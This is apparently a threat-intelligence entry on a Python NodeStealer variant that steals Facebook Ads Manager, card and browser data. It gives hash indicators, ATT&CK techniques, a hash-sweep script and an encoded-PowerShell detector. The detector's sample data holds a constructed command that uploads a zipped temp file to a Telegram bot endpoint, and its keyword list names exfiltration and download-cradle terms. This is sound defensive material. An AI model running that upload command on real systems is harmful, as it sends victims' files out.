
Python-Based NodeStealer Version Targets Facebook Ads Manager

Dec. 19, 2024, 1:39 p.m.

Description

The latest NodeStealer variant has moved from JavaScript to Python and broadened what it steals. Trend Micro's MXDR team uncovered this version in a campaign against a Malaysian educational institution that is attributed to a Vietnamese threat group. The malware now targets Facebook Ads Manager accounts, harvesting financial and business data from them alongside credit card details and browser data. The infection starts with a spear-phishing email carrying a malicious link that downloads and installs the malware disguised as a legitimate application. DLL sideloading and encoded PowerShell commands are used to evade security controls and run the final payload, which exfiltrates the stolen data via Telegram.
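Of the techniques above, the encoded PowerShell step (T1059.001 combined with T1027/T1140) is the one a defender can most easily surface from process-creation telemetry: powershell.exe -EncodedCommand takes a base64 string that decodes to UTF-16LE script text, so the payload can be recovered and inspected offline. The Python below is an added example written for this page, not code from Trend Micro's report or from the malware itself: it finds encoded command lines, decodes them, and flags a small set of hypothetical keyword indicators (the Telegram Bot API host, download cradles, schtasks) chosen for illustration. The sample command lines and the encoded script are constructed inside the file; none of them are captured from the real campaign.

```python
import base64
import re
from typing import Optional

# powershell.exe accepts -EncodedCommand and its abbreviations -e / -ec / -enc.
ENC_RE = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"
)

# Hypothetical post-decode keywords to flag (chosen for this example, not
# taken from the report): Telegram Bot API exfil, download cradles, persistence.
SUSPICIOUS = (
    "api.telegram.org",
    "senddocument",
    "invoke-webrequest",
    "downloadstring",
    "downloadfile",
    "invoke-expression",
    "frombase64string",
    "schtasks",
)


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_ps(blob: str) -> Optional[str]:
    """Reverse encode_ps(); return None if the blob is not valid base64/UTF-16LE."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:          # binascii.Error is a subclass of ValueError
        return None
    if len(raw) % 2:            # UTF-16 code units are two bytes each
        return None
    try:
        return raw.decode("utf-16le")
    except UnicodeDecodeError:
        return None


def analyze(cmdline: str) -> Optional[dict]:
    """Return None for command lines without an encoded payload; otherwise a
    dict with the decoded script (None if undecodable) and matched keywords."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    decoded = decode_ps(m.group(1))
    hits = []
    if decoded is not None:
        low = decoded.lower()
        hits = [k for k in SUSPICIOUS if k in low]
    return {"encoded": True, "decoded": decoded, "indicators": hits}


def hunt(cmdlines):
    """Run analyze() over a list of process command lines, preserving order."""
    return [analyze(c) for c in cmdlines]


# Constructed sample script and command lines (illustrative only).
SAMPLE_SCRIPT = (
    'Invoke-WebRequest -Uri "https://api.telegram.org/botEXAMPLE/sendDocument" '
    '-Method Post -InFile "$env:TEMP\\out.zip"'
)
SAMPLE_CMDLINES = [
    # benign: -ExecutionPolicy starts with -e but is not an encoded command
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    # encoded payload built from SAMPLE_SCRIPT above
    "powershell.exe -NoP -W Hidden -enc " + encode_ps(SAMPLE_SCRIPT),
    # base64 that is not UTF-16LE (odd byte count): encoded but undecodable
    "powershell.exe -ec " + base64.b64encode(b"not a utf16 payload").decode("ascii"),
]

if __name__ == "__main__":
    for cmd, result in zip(SAMPLE_CMDLINES, hunt(SAMPLE_CMDLINES)):
        print(cmd[:60], "->", result)
```

Feed it real command lines from Sysmon Event ID 1 or Windows Security 4688 (with command-line auditing enabled). A command line that is encoded but will not decode is still worth a look: attackers sometimes double-encode or compress the inner script, which this heuristic deliberately does not unwrap.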

Date

Published: Dec. 19, 2024, 12:56 p.m.

Created: Dec. 19, 2024, 12:56 p.m.

Modified: Dec. 19, 2024, 1:39 p.m.

Indicators

f813da93eed9c536154a6da5f38462bfb4ed80c85dd117c3fd681cf4790fbf71

ed1c48542a3e58020bd624c592f6aa7f7868ee16fbb03308269d44c4108011b1

786db3ddf2a471516c832e44b0d9a230674630c6f99d3e61ada6830726172458

1c9c7bb07acb9d612af2007cb633a6b1f569b197b1f93abc9bd3af8593e1ec66

0b1866b627d8078d296e7d39583c9f856117be79c1d226b8c9378fe075369118
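The five values above are SHA-256 file hashes, so the cheapest way to use them is a filesystem sweep. The Python below is an added example for this page, not a tool from Trend Micro: it streams every regular file under a directory through SHA-256 and reports any whose digest is in the indicator set. The demo function builds a throwaway directory with a constructed file and adds that file's own hash to a local copy of the set, purely to show what a hit looks like without needing a real sample.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# SHA-256 indicators copied from the Indicators section above.
NODESTEALER_SHA256 = {
    "f813da93eed9c536154a6da5f38462bfb4ed80c85dd117c3fd681cf4790fbf71",
    "ed1c48542a3e58020bd624c592f6aa7f7868ee16fbb03308269d44c4108011b1",
    "786db3ddf2a471516c832e44b0d9a230674630c6f99d3e61ada6830726172458",
    "1c9c7bb07acb9d612af2007cb633a6b1f569b197b1f93abc9bd3af8593e1ec66",
    "0b1866b627d8078d296e7d39583c9f856117be79c1d226b8c9378fe075369118",
}


def sha256_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream a file through SHA-256 so large files never have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(root: str, iocs=frozenset(NODESTEALER_SHA256)) -> dict:
    """Return {path: sha256} for every regular file under root whose hash is in iocs."""
    wanted = {h.lower() for h in iocs}
    hits = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if not os.path.isfile(path):      # skip sockets, broken symlinks, etc.
                continue
            try:
                digest = sha256_file(path)
            except OSError:                   # locked or unreadable: skip, keep sweeping
                continue
            if digest in wanted:
                hits[path] = digest
    return hits


def demo() -> set:
    """Constructed demo: one benign file and one 'suspect' file whose hash is added
    to a local IOC set. Returns the base names of the files that matched."""
    with tempfile.TemporaryDirectory() as d:
        benign = Path(d) / "notes.txt"
        benign.write_bytes(b"nothing to see here\n")
        suspect = Path(d) / "sub" / "update.exe"
        suspect.parent.mkdir()
        suspect.write_bytes(b"constructed sample, not real malware\n")
        iocs = NODESTEALER_SHA256 | {sha256_file(str(suspect))}
        return {os.path.basename(p) for p in sweep(d, iocs)}


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, digest in sweep(root).items():
        print(f"HIT {digest}  {path}")
    print("demo matched:", demo())
```

Run it as `python sweep.py C:\Users` (or any root) on a host you suspect. Hash matching only catches byte-identical samples, so treat a clean sweep as absence of these five files, not absence of NodeStealer; the scheduled-task and Run-key persistence listed under Attack Patterns below are the better places to look for a recompiled build.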

Attack Patterns

NodeStealer

Vietnamese threat group

T1114.001 (Email Collection: Local Email Collection)

T1053.005 (Scheduled Task/Job: Scheduled Task)

T1574.002 (Hijack Execution Flow: DLL Side-Loading)

T1204.001 (User Execution: Malicious Link)

T1059.001 (Command and Scripting Interpreter: PowerShell)

T1566.002 (Phishing: Spearphishing Link)

T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder)

T1056.001 (Input Capture: Keylogging)

T1071.001 (Application Layer Protocol: Web Protocols)

T1005 (Data from Local System)

T1140 (Deobfuscate/Decode Files or Information)

T1027 (Obfuscated Files or Information)

T1041 (Exfiltration Over C2 Channel)

Additional Information

Education

Malaysia